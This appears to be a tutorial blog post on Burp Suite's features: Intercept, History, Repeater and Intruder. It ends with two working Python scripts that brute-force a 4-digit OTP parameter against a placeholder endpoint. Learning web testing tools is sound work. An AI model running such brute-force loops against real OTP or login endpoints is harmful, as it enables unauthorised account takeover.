Understanding the Key Features of Burp Suite
Burp Suite
Definition
Burp Suite is a web proxy program (packet manipulation program) that sits between the client and the server.
It allows interception of data being sent between the two and provides various tools such as vulnerability scanners and interface analysis tools for web applications.
Usage
Detecting vulnerabilities in web applications
Fixing security flaws
Analyzing web application interfaces
Installation on Ubuntu
Install Java
sudo apt-get install openjdk-8-jre
Download Burp Suite Community edition
Run the installation file
Open the terminal in the download folder
sudo bash burpsuite_community_linux_v2021_9_1.sh
Run Burp Suite
Go to /usr/local/bin, the default installation location, and run Burp Suite from the terminal
/BurpSuiteCommunity
Key Features of Burp Suite
Intercept
Definition
One of the features of Burp Suite allows you to stop requests being sent to the server. You can modify the packet in the middle and send it.
Steps
Turn on proxy-intercept-intercept
Open the browser
All requests made by the opened Chromium browser will be stopped in the middle, and cannot be sent without permission from Burp Suite.
Forward: Sends the stopped request to the server. You can modify the request before sending it.
Drop: Deletes the stopped request. The server does not receive this request.
History
Definition
One of the features of Burp Suite allows you to see all requests and responses made in the Chromium browser.
Steps
proxy-intercept-HTTP history
Open the browser
You can view all requests and responses made in the opened Chromium browser.
Repeater
Definition
One of the features of Burp Suite allows you to send a request multiple times with modifications to the server and see the response immediately after sending.
Steps
proxy-intercept-HTTP history-Select the request you want to repeat-Right-click-Send to Repeater
Modify the request and click "Send" to see the response
Intruder
Definition
One of the features of Burp Suite allows you to brute force passwords by sending repeated requests.
Steps
proxy-intercept-HTTP history-Select the request you want to repeat-Right-click-Send to Intruder
position-clear-select the part you want to modify repeatedly-Add
payload-Set how to modify the selected part
Start attack
The attack speed is a bit slow and you have to search from predefined places, so if you need complex conditions, it is better to write and attack separately with Python.
If you use Python libraries such as httplib2 or requests, you can replace the Intruder function.
Python Example
HTTP request: GET example.php?otp_num=1111 HTTP/1.1
Variable: otp_num
Range of attempts: 0000~9999
Condition: Success
import httplib2
# Target website URL (here: example.com)
url = "<https://example.com/example.php>"
# Create an httplib2 instance
http_obj = httplib2.Http()
# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
# Format otp_num as a 4-digit number (e.g., 0035)
otp_num_formatted = f"{otp_num:04d}"
# Add otp_num parameter to GET request
request_url = f"{url}?otp_num={otp_num_formatted}"
response, content = http_obj.request(request_url, method="GET")
# You can modify the processing depending on how you want to find the desired result.
# For example, if the server returns a specific message, you can check it.
if b"Success" in content:
print(f"Success! OTP number is: {otp_num_formatted}")
break
else:
print(f"Failed for OTP number: {otp_num_formatted}")
import requests
# Target website URL (here: example.com)
url = "<https://example.com/example.php>"
# Range of otp_num (0000 to 9999)
for otp_num in range(10000):
# Format otp_num as a 4-digit number (e.g., 0035)
otp_num_formatted = f"{otp_num:04d}"
# Add otp_num parameter to GET request
response = requests.get(url, params={"otp_num": otp_num_formatted})
# You can modify the processing depending on how you want to find the desired result.
# For example, if the server returns a specific message, you can check it.
if "Success" in response.text:
print(f"Success! OTP number is: {otp_num_formatted}")
break
else:
print(f"Failed for OTP number: {otp_num_formatted}")